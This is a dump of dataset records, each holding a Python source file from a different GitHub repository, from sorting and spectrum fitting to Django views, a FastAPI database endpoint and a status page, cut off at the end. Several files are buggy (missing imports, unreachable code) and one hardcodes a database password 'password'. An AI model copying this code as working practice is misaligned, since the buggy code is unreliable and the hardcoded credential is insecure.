#[1,2,3,4]\n","repo_name":"mangalagb/Leetcode","sub_path":"Others/Sorting/BottomUpMergeSort.py","file_name":"BottomUpMergeSort.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5043415907","text":"import re\n\nfrom . import Mod\n\n\nHTML_TAG_REGEX = r\"<(\\w+[^>\\n]*)>\"\n\n\ndef insert_slash_after_opening_tag_names(output, count=1, include = None, exclude = []):\n p1 = re.compile(HTML_TAG_REGEX)\n p2 = re.compile(r\"(\\s*)(\\w+)([\\s\\S]*)\")\n\n if include is not None:\n include = [x.lower() for x in include]\n if exclude is not None:\n exclude = [x.lower() for x in exclude]\n\n def replace_tag_content(tag_content):\n def f(m):\n tag = m.group(2).lower()\n if (include is None and tag not in exclude) or (include is not None and tag in include and tag not in exclude):\n return m.group(1) + m.group(2) + \" \" + \"/\" * count + m.group(3)\n else:\n return m.group(1) + m.group(2) + m.group(3)\n tag_content = p2.sub(f, tag_content)\n return tag_content\n\n output = p1.sub(lambda m: replace_tag_content(m.group()), output)\n return output\n\nmod_insert_slash_after_opening_tag_names = Mod(insert_slash_after_opening_tag_names)","repo_name":"ZwCreatePhoton/htmlmth","sub_path":"htmlmth/mods/html/insert_slash_after_opening_tag_names.py","file_name":"insert_slash_after_opening_tag_names.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"40891106326","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 1 10:54:49 2019\n\n@author: aholm\n\"\"\"\n\nimport numpy as np\nfrom scipy.signal import savgol_filter\nfrom scipy.optimize import curve_fit as cf\nimport pandas as pd\n\ndef gaussian(x, amp, cen, sig, lin, lift):\n return amp * np.exp(-(x-cen)**2 / (2*sig**2)) + lin*x + lift\n\ndef FitSASE(dataset):\n #Fit the SASE region of the spectrum to a Gaussian\n #Import in the well fit seeded specs\n PositiveDataSet = pd.read_pickle('./GoodData/SeedData'+str(dataset)+'.pkl')\n \n Specs = PositiveDataSet['Shot Spec'].values.tolist()\n TrialNum = PositiveDataSet['Spec Number'].values.tolist()\n \n #Smooth out spec in order to reduce noise which is prevalent in the SASE\n smoothlist=[]\n for i in range(len(Specs)):\n #savgol process keeps domain intact\n #This number is the number of points to bin together\n average_number = 151\n smooth = savgol_filter(Specs[i],average_number,1)\n smoothlist.append(smooth)\n smoothlist=np.array(smoothlist)\n \n #Initalize lists to populate with fits\n newdomainlist=[]\n valueslist=[]\n fitlist=[]\n r2list=[]\n for i in range(len(smoothlist)):\n #Set bounds to check for maximum to begin fitting process\n lower=100\n upper=1000\n domain = np.arange(lower,upper)\n #Find location of maximum value within this region\n peak = np.argmax(smoothlist[i][domain]) + lower\n guess_x=peak\n #Find domain to fit the gaussian to\n #This looks for when the guassian crosses below some factor of the\n #peak amplitude\n relative_check=0.20\n tolerance=relative_check*smoothlist[i][peak]\n x=0\n while x==0:\n if smoothlist[i][guess_x] >= tolerance:\n guess_x+=-1\n else:\n lower=guess_x\n x=1\n guess_x=peak\n x=0\n while x==0:\n if smoothlist[i][guess_x] >= tolerance:\n guess_x+=1\n else:\n upper=guess_x\n x=1\n newdomain = np.arange(lower,upper)\n newdomainlist.append(newdomain)\n #Initalize Guess parameters\n guess = [50000,peak,100,0,0]\n try:\n #Fit function to gaussian as defined above within domain\n values, covarience = cf(gaussian,newdomain,smoothlist[i][newdomain],p0=guess)\n values[2] = np.abs(values[2])\n valueslist.append(values)\n fit = gaussian(newdomain,values[0],values[1],values[2],values[3],values[4])\n fitlist.append(fit)\n #Calculate R2 value\n residual = np.sum((smoothlist[i][newdomain] - fit)**2)\n total = np.sum((smoothlist[i][newdomain]-np.mean(smoothlist[i][newdomain]))**2)\n r2 = 1 - (residual/total)\n r2list.append(r2)\n except (RuntimeError, TypeError):\n #In case of error, populate with 0s that will be filtered out later\n valueslist.append([0,0,0,0,0])\n fitlist.append(np.zeros(len(newdomain)))\n r2list.append(0)\n #Make into numpy arrays in order allow easier manipulation\n newdomainlist=np.array(newdomainlist)\n valueslist=np.array(valueslist)\n fitlist=np.array(fitlist)\n r2list=np.array(r2list)\n \n #Initalize empty arrays to populate with only good R2 fits\n goodtrial=[]\n goodpositive=[]\n gooddomain=[]\n goodvalues=[]\n goodfit=[]\n goodr2=[]\n \n #Populate arrays with good R2 fits\n for i in range(len(Specs)):\n if r2list[i] >= 0.95:\n goodpositive.append(Specs[i])\n gooddomain.append(newdomainlist[i])\n goodvalues.append(valueslist[i])\n goodfit.append(fitlist[i])\n goodr2.append(r2list[i])\n goodtrial.append(TrialNum[i])\n \n #Split good values into their respective quantities\n SASEPara = np.transpose(goodvalues)\n Amp = SASEPara[0]\n Wave = SASEPara[1]\n Sig = SASEPara[2]\n Xterm = SASEPara[3]\n Constant = SASEPara[4]\n \n #Create Dictionary in which to later convert to a dataframe\n gooddict = {'Spec Number':goodtrial,'Shot Spec':goodpositive,\n 'SASE Domain':gooddomain,'SASE Gaussian Fit':goodfit,\n 'SASE R2':goodr2,'SASE Amplitude':Amp,'SASE Energy':Wave,\n 'SASE Sigma':Sig,'SASE Linear':Xterm,'SASE Constant':Constant}\n \n GoodData = pd.DataFrame.from_dict(gooddict)\n GoodData.to_pickle('./GoodData/SASEData'+str(dataset)+'.pkl')\n return GoodData\n\n","repo_name":"ahol77/DoublePulse","sub_path":"FitSase.py","file_name":"FitSase.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24828930807","text":"\n\ndef build_string_from_list(ll):\n str1 = \"\"\n for ele in ll:\n str1 += \"{}\".format(ele)\n return str1\n\n\n\ndef parity_brute_force(x):\n bit = 0\n num_bits = 0\n while x:\n bitmask = 1 << bit\n bit += 1\n if x & bitmask:\n num_bits += 1\n x &= ~bitmask\n\n return num_bits % 2\n\n\ndef calc_two_parity_bits(bit_val):\n\n lv = bit_val and 31\n hv = bit_val and 992\n\n last_bits= str.format(\"{}{}\",parity_brute_force(lv), parity_brute_force(hv))\n print (\"last_bits = \", last_bits)\n return last_bits\n\n\ndef calc_single_parity_bits(bit_val):\n\n last_bits= str.format(\"{}\",parity_brute_force(bit_val))\n print (\"parity bit = \", last_bits)\n return last_bits\n\n\ndef calculate_numer_of_wrong_address(k,alpha):\n if k==1:\n return alpha\n return 2*alpha*calculate_numer_of_wrong_address(k-1,alpha) + alpha\n\n alpha=0.4\n while alpha < 0.8:\n res= calculate_numer_of_wrong_address(2,alpha)\n print(\"alpha {}:\".format(alpha)+ \" r = {}\".format(res))\n alpha += 0.05\n\n for k in range(1,22):\n res = calculate_numer_of_wrong_address(k, 0.5)\n print(\"k {}:\".format(k) + \" r = {}\".format(res))\n\n for k in range(1, 11):\n print (\"for prefix {} p=\".format(k) + \"{}\".format(0.5**(10-k)))\n\n\n # print (\"FP for 640 \")\n\n # for n in range (1,161):\n # rate = 640/n\n # print(\"rate m/n = {}\".format(rate))\n # print (\"for n={} \".format(n) + \"FP = {}\".format((0.6185) ** rate))\n\n\nif __name__ == '__main__':\n link = \"http://www.somesite.com/details.pl?urn=2344\"\n f = urllib.urlopen(link)\n myfile = f.read()\n print(myfile)","repo_name":"segevere/BFLUT","sub_path":"GeneralMethods.py","file_name":"GeneralMethods.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24462948242","text":"from __future__ import absolute_import, print_function\nimport datetime\nfrom systemalib.utils.retry import retry_fn, exponential_sleep\n\n\ndef _rate_limit(_data, fn, *args, **kwargs):\n '''Provides rate limiting logic, but permits shared rate limiting values.\n\n Pass in a dictionary as the first arguement with a value for the 'per_second' key.\n\n Example usage::\n\n from functools import partial\n rate_limit = partial(_rate_limit, _data={'per_second': 2})\n rate_limit(my_func, a, b)\n rate_limit(my_other_func, b, c)\n\n '''\n delay = 1.0 / float(_data.get('per_second'))\n if not _data.get('last_call'):\n _data['last_call'] = datetime.datetime.now() - datetime.timedelta(seconds=delay)\n retries = _data.get('retries', 3)\n\n def func(*args, **kwargs):\n _data['last_call'] = datetime.datetime.now()\n return fn(*args, **kwargs)\n\n retry_fn(retries, 2.0, exponential_sleep, func, *args, **kwargs)\n\n for retry_count in range(1, retries + 1):\n try:\n _data['last_call'] = datetime.datetime.now()\n return fn(*args, **kwargs)\n except Exception as e:\n time.sleep(delay)\n\n print('{}: Retry {} - {}'.format(fn.__name__, retry_count, str(e)))\n # double the wait time\n delay *= 2.0\n print('{}: Too many retries - {}'.format(fn.__name__, str(e)))\n raise e\n","repo_name":"adamlwgriffiths/flask_skeleton","sub_path":"webserver/utils/limit.py","file_name":"limit.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"11055947800","text":"from django.shortcuts import render_to_response, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\n\n\ndef sign_in(request):\n if request.method == \"GET\":\n return render_to_response('login.html')\n else:\n # processing signin action\n\n # authenticate & exception handling\n\n # status 未定\n return HttpResponse(status=200)\n\n\n\ndef sign_out(request):\n if request.user.is_authenticated:\n print (\"user has been login\")\n logout(request)\n\n return redirect(\"/\")\n \n\ndef get_user_info(request):\n if request.user.is_authenticated:\n print (request.user.username, request.user.email)\n else:\n print (\"Anoymous user\")\n \n return HttpResponse(status=200)\n","repo_name":"ShareClass/django-oauth-demo","sub_path":"oauth_demo/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13112458345","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport unicodedata\nimport re\n\nimport enum\nimport pandas\nfrom xlsxwriter import utility\n\n\nCSV_RE = re.compile(r'\\s*,\\s*')\nINT_RE = re.compile(r'\\d+')\n\ndef and_concat(conds):\n assert len(conds) > 0\n if len(conds) == 1:\n return conds[0]\n return conds[0] & and_concat(conds[1:])\n\ndef or_concat(conds):\n assert len(conds) > 0\n if len(conds) == 1:\n return conds[0]\n return conds[0] | or_concat(conds[1:])\n\n\ndef all_false_case(frame):\n conds = []\n for column in frame.columns:\n conds.append(frame[column].eq(False))\n return and_concat(conds)\n\n\ndef is_nans(array):\n \"\"\"\n :type array: list of value or pandas.Series\n \"\"\"\n if isinstance(array, pandas.Series):\n return set(array.isnull()) == {True}\n temp = []\n return set([is_nan(x) for x in array]) == {True}\n\ndef is_nan(x):\n \"\"\"\n :type x: any value\n \"\"\"\n if not isinstance(x, float):\n return False\n return pandas.np.isnan(x)\n\n\ndef split(x):\n return CSV_RE.split(x)\n\n\ndef expand_multiple(series):\n index = series.index\n result = (\n expand_base(series)\n .apply(sorted)\n .apply(pandas.Series)\n .reindex(index)\n )\n # Empty special case\n if isinstance(result, pandas.Series):\n return pandas.DataFrame()\n return result\n\ndef expand_multiple_bool(series):\n index = series.index\n result = (\n expand_base(series)\n .apply(lambda x: pandas.Series(1, index=x))\n .reindex(index)\n .fillna(0)\n .astype(bool)\n )\n # Empty special case\n if isinstance(result, pandas.Series):\n return pandas.DataFrame()\n return result\n\n\ndef expand_base(series):\n if len(series) == 0:\n return series\n return (\n series\n .dropna()\n .apply(round_cast)\n .apply(str)\n .apply(text_normalize)\n .str\n .split(r\"\\s*,\\s*\")\n .apply(lambda x: map(int_cast, x))\n .apply(set)\n )\n\n\ndef int_cast(x):\n try:\n return int(x)\n except:\n return x\n\n\ndef round_cast(x):\n if not isinstance(x, float):\n return x\n casted = int_cast(x)\n # 1 == 1.0\n if casted == x:\n return casted\n else:\n return x\n\n\ntext_type = str\n\ndef text_normalize(text):\n return unicodedata.normalize(\"NFKC\", text_type(text))\n\n\ndef parse_csv(text):\n return re.split(r\"\\s*,\\s*\", text)\n\n\ndef unique_list(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if x not in seen and not seen_add(x)]\n\n\nRangeVector = enum.Enum(\"RangeVector\", \"Unknown X Y\")\n\ndef createChartRange(sheetname, rowcols):\n assert(len(rowcols) > 0)\n options = {\n \"row_abs\": True,\n \"col_abs\": True,\n }\n to_cell = lambda y, x: utility.xl_rowcol_to_cell(y, x, **options)\n def to_range(start, end):\n if start == end:\n return to_cell(*start)\n else:\n return \"{}:{}\".format(to_cell(*start), to_cell(*end))\n start = rowcols[0]\n rowcol = rowcols[0] # for len(rowcols) == 1\n prev = rowcols[0]\n cells = []\n vec = RangeVector.Unknown\n for rowcol in rowcols[1:]:\n if (prev[0]+1, prev[1]) == rowcol and vec in [RangeVector.Y, RangeVector.Unknown]:\n vec = RangeVector.Y\n elif (prev[0], prev[1]+1) == rowcol and vec in [RangeVector.X, RangeVector.Unknown]:\n vec = RangeVector.X\n else:\n cells.append(to_range(start, prev))\n start = rowcol\n vec = RangeVector.Unknown\n prev = rowcol\n cells.append(to_range(start, rowcol))\n sheetname = sheetname.replace(\"'\", \"''\")\n return \"=({})\".format(\",\".join([\"'{}'!{}\".format(sheetname, x) for x in cells]))\n\ndef normalizeSheetName(sheetname):\n # reserved chars: :\\/?*[]\n sheetname = sheetname.replace(\"[\", \"【\").replace(\"]\", \"】\").replace(\"[\", \"【\").replace(\"]\", \"】\")\n sheetname = re.sub(r\"[:\\\\/\\?\\*:¥/?*]\", \"\", sheetname)\n sheetname = re.sub(r\"\\s\", \"\", sheetname)\n return sheetname\n","repo_name":"mugwort-rc/qsurveytools","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32005213279","text":"from typing import Union\nimport time\nfrom fastapi import Request, FastAPI\nfrom pydantic import BaseModel\nfrom mysql.connector import connect, Error\nimport json\nimport base64\nimport logging\nfrom datetime import datetime\nfrom pytz import timezone\n\n# This program exposes a POST endpoint at /event that is used by the SNS trigger to post info about a SNS event that\n# has passed the source/sensor filter stage, in the request body. The endpoint parses the event info and creates\n# a new db record, including the current time stamp.\n\n\n# This is not used right now..\nclass SNSEvent(BaseModel):\n PayloadId: int\n EventType: str\n Author: str\n EventTimestamp: str\n CustomMessage: Union[str, None] = None\n created_ts = time.time()\n CreatedAtTimestamp = datetime.fromtimestamp(created_ts).strftime('%Y-%m-%d %H:%M:%S')\n\n\napp = FastAPI()\n\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nconsole = logging.StreamHandler()\n# to also write logs to file:\n# fh = logging.FileHandler('tmp/spam.log')\nconsole.setFormatter(formatter)\n# add the handler to the root logger\nlogger = logging.getLogger('sns-trigger-app')\n# setting up log level must be like this, otherwise it doesn't work or leads to duplicate logs\nlogger.setLevel(logging.INFO)\nlogger.addHandler(console)\n\n\n@app.post(\"/event/\")\nasync def create_db_entry(request: Request):\n\n msg_body = await request.body()\n msg_json = json.loads(msg_body)\n msg_json = json.loads(msg_json['data'])\n\n # This info is added by the event source. We can use the event_type to infer the type of event\n event_id = msg_json['context']['id']\n event_type = msg_json['context']['type']\n\n msg_data_decoded = json.loads(base64.b64decode(msg_json['data']).decode('utf-8'))\n if msg_data_decoded[\"debug_mode\"] == 1:\n logger.info(\"original request body: {0}\".format(msg_body))\n logger.info(\"message data decoded: {0}\".format(msg_data_decoded))\n # don't use this time, this is the timestamp inserted by argo sensor. We are interested in the original Timestamp\n # in the message\n # event_ts = msg_json['context']['time']\n\n # connect to the mysql database and insert a record of the following schema:\n # PayloadId, EventType, CustomMessage, Author, EventTimestamp, CreatedAtTimestamp\n\n try:\n with connect(\n host=\"mysql.argo-events\",\n password=\"password\",\n database=\"argo_event_record_db\"\n ) as connection:\n logger.info(\"successfully connected to database\")\n x = connection.cursor()\n # need to be careful of timezone, otherwise the actual time will depend on the timezone of the EC2 instance\n # where this code is running!\n fmt = '%Y-%m-%d %H:%M:%S.%f'\n est = timezone('US/Eastern')\n now_time = datetime.now(est)\n created_at_ts = now_time.strftime(fmt)\n # logger.info(msg_data_decoded[\"body\"][\"Message\"])\n payload_id = msg_data_decoded[\"id\"]\n author = msg_data_decoded[\"author\"]\n custom_message = msg_data_decoded[\"message\"]\n event_ts = msg_data_decoded[\"Timestamp\"] # in UTC, convert to US/East\n event_ts = datetime.strptime(event_ts, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n # converting to EST, so it can be compared with now time, also in EST\n event_ts = event_ts.astimezone(est)\n x.execute(\"\"\"INSERT into argo_event_record (PayloadId, EventType, Author, CustomMessage, EventTimestamp, CreatedAtTimestamp) \\\n values(%s ,%s, %s, %s, %s, %s)\"\"\", (payload_id, event_type, author, custom_message, \\\n event_ts, created_at_ts))\n connection.commit()\n\n except Error as e:\n logger.error(\"failed connecting to database\")\n\n return await request.json()\n\n# Test:curl -X POST \"http://127.0.0.1:8000/event/\" -H \"Content-Type: application/json\" -d '{\"Author\": \"Ankur\", \"PayloadId\": 4, \"EventType\": \"sqs\", \"CustomMessage\": \"tbd\", \"EventTimestamp\": \"2007-03-04T21:08:12Z\"}'\n# on kubernetes\n# kubectl run mycurlpod --image=curlimages/curl -i --tty -- sh\n# if pod is already running:\n# kubectl exec mycurlpod -i --tty -- sh\n# curl -X POST \"http://http-server-svc.argo-events:8000/event/\" -H \"Content-Type: application/json\" -d '{\"Author\": \"Ankur\", \"PayloadId\": 4, \"EventType\": \"sqs\", \"CustomMessage\": \"tbd\", \"EventTimestamp\": \"2007-03-04T21:08:12Z\"}'\n","repo_name":"ankur6ue/argo-events","sub_path":"sns-trigger-app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71039018177","text":"from .BaseError import BaseError\nfrom mongoengine import *\nimport hashlib\n\n\nclass ExceptionError(BaseError):\n \"\"\"\n This class represents the most typical scenario of error - when an uncaught exception bubbles to the top.\n \"\"\"\n\n stacktrace = StringField()\n\n source = StringField()\n\n lineNumber = IntField()\n\n columnNumber = IntField()\n\n def computeHash(self):\n hasher = hashlib.sha256()\n hasher.update(bytes(self.stacktrace, \"utf8\"))\n\n return hasher.hexdigest()\n\n\n def generateErrorDescription(self):\n return self.stacktrace\n","repo_name":"genixpro/kwola","sub_path":"kwola/datamodels/errors/ExceptionError.py","file_name":"ExceptionError.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"79"} +{"seq_id":"42818166003","text":"\"\"\"Network graph setup.\"\"\"\n\nimport logging\nimport pandas as pd\nimport numpy as np\nimport networkx as nx\nfrom networkx.classes.graph import Graph\nfrom networkx.classes.digraph import DiGraph\nfrom typing import Union\nimport random\nfrom itertools import product\nfrom copy import deepcopy\nfrom sklearn.model_selection import train_test_split\nfrom ast import literal_eval\n\n# Logging text colors\ndef red(text: str):\n return u\"\\u001b[31m{}\\u001b[0m\".format(text)\n\n\ndef blue(text: str):\n return u\"\\u001b[34m{}\\u001b[0m\".format(text)\n\n\n# Graph initialisation\ndef create_train_graph(targets: dict) -> Graph:\n \"\"\"Initialise an undirected NetworkX graph from an adjacency list.\n\n Args:\n targets: training adjacency list as a dictionary, with source nodes as keys\n and target nodes as values.\n\n Returns:\n A NetworkX graph object.\n\n \"\"\"\n sources = list(targets.keys())\n G = nx.Graph()\n for s in sources:\n edges = list(product([s], targets[s]))\n G.add_edges_from(edges)\n return G\n\n\ndef create_train_digraph(targets: dict) -> DiGraph:\n \"\"\"Initialise an directed NetworkX graph from an adjacency list.\n\n Args:\n targets: training adjacency list as a dictionary, with source nodes as keys\n and target nodes as values.\n\n Returns:\n A NetworkX graph object.\n\n \"\"\"\n sources = list(targets.keys())\n G = nx.DiGraph()\n for s in sources:\n edges = list(product([s], targets[s]))\n G.add_edges_from(edges)\n return G\n\n\n# Edge extraction\ndef get_test_edges(edges: pd.DataFrame) -> list:\n \"\"\"Extracts edges from test dataset.\n\n Args:\n edges: a Pandas dataframe with three columns (Id, Source and Sink), where:\n - Id is a unique identifier for the edge.\n - Source is the source node of the edge.\n - Sink is the target node for the edge.\n\n Returns:\n A list of (Source, Sink) tuples representing the edges.\n\n \"\"\"\n return [(str(x.Source), str(x.Sink)) for x in edges.itertuples()]\n\n\ndef get_all_edges(G: Union[Graph, DiGraph]) -> list:\n \"\"\"Extracts all edges from a NetworkX graph..\n\n Args:\n G: a NetworkX undirected or directed graph object.\n\n Returns:\n A list of (Source, Sink) tuples representing the edges.\n\n \"\"\"\n return list(G.edges)\n\n\ndef create_subgraph(\n G: Union[Graph, DiGraph], edges: Union[list, pd.DataFrame]\n) -> Union[Graph, DiGraph]:\n \"\"\"Create a subgraph of a NetworkX graph by hiding a list of edges.\n\n Args:\n G: a NetworkX undirected or directed graph object.\n\n edges: a list of edges to be hidden, OR a Pandas dataframe containing a column\n labelled \"edge\", which will form the edge list.\n\n Returns:\n The corresponding subgraph.\n\n \"\"\"\n if type(edges) == pd.DataFrame:\n edges = edges.edge\n subG = deepcopy(G)\n subG.remove_edges_from(edges)\n return subG\n\n\n# Sample generation\ndef hide_edges(G: Union[Graph, DiGraph], edges: list, parameters: dict) -> dict:\n \"\"\"Remove a random subset of edges from a NetworkX graph.\n\n Args:\n G: a NetworkX undirected or directed graph object.\n\n edges: a list of edges, of which a random subset will be hidden.\n\n parameters: parameters defined in parameters.yml.\n\n Returns:\n A dictionary containing:\n subG: the subgraph of G generated by hiding edges.\n hidden: list of hidden edges.\n\n \"\"\"\n # Generate a random list of edges to hide\n random.seed(parameters[\"seed\"])\n hidden = random.sample(edges, k=parameters[\"setup\"][\"N_hidden\"])\n\n # Create a subgraph by removing edges\n subG = create_subgraph(G, hidden)\n\n return dict(subG=subG, hidden=hidden)\n\n\ndef fake_edges(\n targets: dict, subG: Graph, hidden: list, test: list, parameters: dict\n) -> list:\n \"\"\"Randomly generates fake edges from source nodes to target nodes in a subgraph.\n\n Args:\n targets: training adjacency list as a dictionary, with source nodes as keys\n and target nodes as values.\n\n subG: a NetworkX graph object, which is a subgraph of the training network.\n\n hidden: list of hidden edges.\n\n test: list of edges in the test set.\n\n parameters: parameters defined in parameters.yml.\n\n Returns:\n List of source nodes.\n\n \"\"\"\n fakes = []\n sources = list(targets.keys())\n targets = subG.nodes\n np.random.seed(parameters[\"seed\"])\n while len(fakes) < parameters[\"setup\"][\"N_fake\"]:\n s = np.random.choice(sources)\n t = np.random.choice(targets)\n if (\n s != t # no self loops\n and not subG.has_edge(s, t) # edge does not exist in subgraph\n and not (s, t) in hidden # edge has not been hidden\n and not (s, t) in test # edge is not in the test set\n and not (s, t) in fakes # edge has not already been created\n ):\n fakes.append((s, t))\n return fakes\n\n\ndef create_sample(hidden: list, fakes: list) -> pd.DataFrame:\n \"\"\"Creates a Pandas DataFrame with a random ordering of hidden edges and fake edges.\n\n Args:\n hidden: list of hidden edges.\n\n fakes: list of fake edges.\n\n Returns:\n Pandas dataframe with two columns:\n edge: the edge as a tuple in the form (source, sink).\n label: a binary variable taking the value 1 if the edge was hidden and 0\n if it was fake.\n\n \"\"\"\n sample = [(x, 1) for x in hidden] + [(x, 0) for x in fakes]\n np.random.shuffle(sample)\n return pd.DataFrame(sample, columns=[\"edge\", \"label\"])\n\n\ndef self_loop(edge):\n source, sink = edge\n return int(source == sink)\n\n\ndef preprocess_sample(df: pd.DataFrame, test: list) -> pd.DataFrame:\n \"\"\"Import a training sample and format it for data processing.\n\n Args:\n Pandas dataframe with two columns:\n label: a binary variable taking the value 1 if the edge was hidden and 0\n if it was fake.\n edge: the edge as a tuple in the form (source, sink).\n\n test: list of test edges.\n\n Returns:\n Pre-processed Pandas dataframe.\n\n \"\"\"\n log = logging.getLogger(__name__)\n\n # Randomly shuffle the sample and fix formatting\n df = df.sample(frac=1)\n df = df.rename(columns={\"nodes\": \"edge\"})\n df.edge = [literal_eval(x) for x in df.edge]\n df.edge = [(str(u), str(v)) for u, v in df.edge]\n\n # Remove test edges\n df[\"test\"] = df.edge.apply(lambda x: x in test)\n if any(df[\"test\"]):\n log.warning(\n red(\"Dropping {} test edge(s) from sample.\").format(sum(df[\"test\"]))\n )\n df = df[df.test == False]\n\n # Drop duplicates\n df_nodups = df.drop_duplicates()\n n_dups = len(df) - len(df_nodups)\n if n_dups > 0:\n log.warning(red(\"Dropping {} duplicate(s) from sample.\").format(n_dups))\n df = df_nodups\n\n # Check for self loops\n df[\"self_loop\"] = df.edge.apply(self_loop)\n n_loops = sum(df.self_loop)\n if n_loops:\n log.warning(red(\"Dropping {} self-loop(s) from sample.\").format(n_loops))\n df = df[df.self_loop == 0]\n df = df.drop(\"self_loop\", axis=1)\n\n return df[[\"edge\", \"label\"]]\n\n\ndef split_sample(sample: pd.DataFrame, parameters: dict) -> list:\n \"\"\"Splits sample data into training and validation sets.\n\n Args:\n sample: Pandas dataframe containing sample edges and class labels.\n\n Returns:\n A list containing split data.\n\n \"\"\"\n if parameters[\"setup\"][\"train_size\"]:\n return train_test_split(sample, train_size=parameters[\"setup\"][\"train_size\"])\n elif parameters[\"setup\"][\"valid_size\"]:\n return train_test_split(sample, test_size=parameters[\"setup\"][\"valid_size\"])\n\n\ndef extract_classes(classes: pd.DataFrame) -> dict:\n \"\"\"Extracts edges and class labels from labelled training data.\n\n Args:\n classes: Pandas dataframe with two columns:\n edge: the edge as a tuple in the form (source, sink).\n valid: a binary variable taking the value 1 if the edge was hidden and 0\n if it was fake.\n\n Returns:\n A dictionary containing lists for the edges and class labels.\n \"\"\"\n return dict(edges=list(classes.edge), classes=classes.label)\n","repo_name":"thomas-duke/twitter-network","sub_path":"src/twitter_network/nodes/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":8389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1961862111","text":"import logging\nimport babel.dates\nimport datetime\n\nfrom isserviceup.config import config\nfrom flask import Flask, jsonify, render_template\nfrom flask_cors import CORS, cross_origin\nfrom raven.contrib.flask import Sentry\nimport redis\n\nfrom isserviceup.services.models.service import Status\n\napp = Flask(__name__, static_url_path='', static_folder='static')\napp.config.from_object(config)\nCORS(app)\napp.debug = config.DEBUG\n\nif config.SENTRY_DSN:\n sentry = Sentry(app, logging=True, level=logging.ERROR)\n\nrclient = redis.from_url(config.REDIS_URL, charset=\"utf-8\", decode_responses=True)\n\n\n@app.template_filter('timedelta')\ndef format_timedelta(value):\n now = datetime.datetime.now()\n return babel.dates.format_timedelta(value - now, add_direction=True)\n\n\n@app.route('/', methods=['GET'])\ndef get_index():\n services = config.SERVICES\n\n status_values = {\n Status.ok.name: ('Operational', 'fa-check', 'green'),\n Status.minor.name: ('Degraded Performance', 'fa-minus-square', 'yellow'),\n Status.major.name: ('Partial Outage', 'fa-exclamation-triangle', 'orange'),\n Status.critical.name: ('Major Outage', 'fa-times', 'red'),\n Status.maintenance.name: ('Maintenance', 'fa-wrench', 'blue'),\n Status.unavailable.name: ('Status Unavailable', 'fa-question', 'gray')\n }\n\n pipe = rclient.pipeline()\n for service in services:\n pipe.hgetall('service:{}'.format(service.name))\n pipe.get('services:last_update')\n values = pipe.execute()\n\n data = []\n for i, service in enumerate(services):\n if not values[i]:\n status = Status.unavailable.name\n last_service_update = ''\n else:\n status = values[i]['status']\n last_service_update = float(values[i]['last_update'])\n s = {\n 'name': service.name,\n 'status_page_url': service.status_url,\n 'icon_url': service.icon_url,\n 'status': status_values[status][0],\n 'last_update': last_service_update,\n 'status_icon': status_values[status][1],\n 'status_color': status_values[status][2],\n }\n data.append(s)\n\n last_update = float(values[-1]) if values[-1] else 0\n last_update = datetime.datetime.fromtimestamp(last_update)\n return render_template('index.html', services=data, last_update=last_update)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000)\n","repo_name":"GregBorrelly/is-service-up","sub_path":"isserviceup/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"43884298914","text":"import shutil\nimport time\nimport os.path\nimport os\n\nfrom rez.system import system\nfrom rez.build_process import create_build_process\nfrom rez.build_system import create_build_system\nfrom rez.resolved_context import ResolvedContext\nfrom rez.packages import get_latest_package\nfrom rez.package_copy import copy_package\nfrom rez.version import VersionRange\nfrom rez.tests.util import TestBase, TempdirMixin\n\n\nclass TestCopyPackage(TestBase, TempdirMixin):\n @classmethod\n def setUpClass(cls):\n TempdirMixin.setUpClass()\n\n packages_path = cls.data_path(\"builds\", \"packages\")\n cls.src_root = os.path.join(cls.root, \"src\", \"packages\")\n cls.install_root = os.path.join(cls.root, \"packages\")\n shutil.copytree(packages_path, cls.src_root)\n\n # repo we will copy packages into\n cls.dest_install_root = os.path.join(cls.root, \"dest_packages\")\n\n # include modules\n pypath = cls.data_path(\"python\", \"late_bind\")\n\n cls.settings = dict(\n packages_path=[cls.install_root],\n package_filter=None,\n package_definition_python_path=pypath,\n resolve_caching=False,\n warn_untimestamped=False,\n warn_old_commands=False,\n implicit_packages=[])\n\n @classmethod\n def tearDownClass(cls):\n TempdirMixin.tearDownClass()\n\n def setup_once(self):\n # build packages used by this test\n self._build_package(\"build_util\", \"1\")\n self._build_package(\"floob\")\n self._build_package(\"foo\", \"1.0.0\")\n self._build_package(\"foo\", \"1.1.0\")\n self._build_package(\"bah\", \"2.1\")\n\n @classmethod\n def _create_builder(cls, working_dir):\n buildsys = 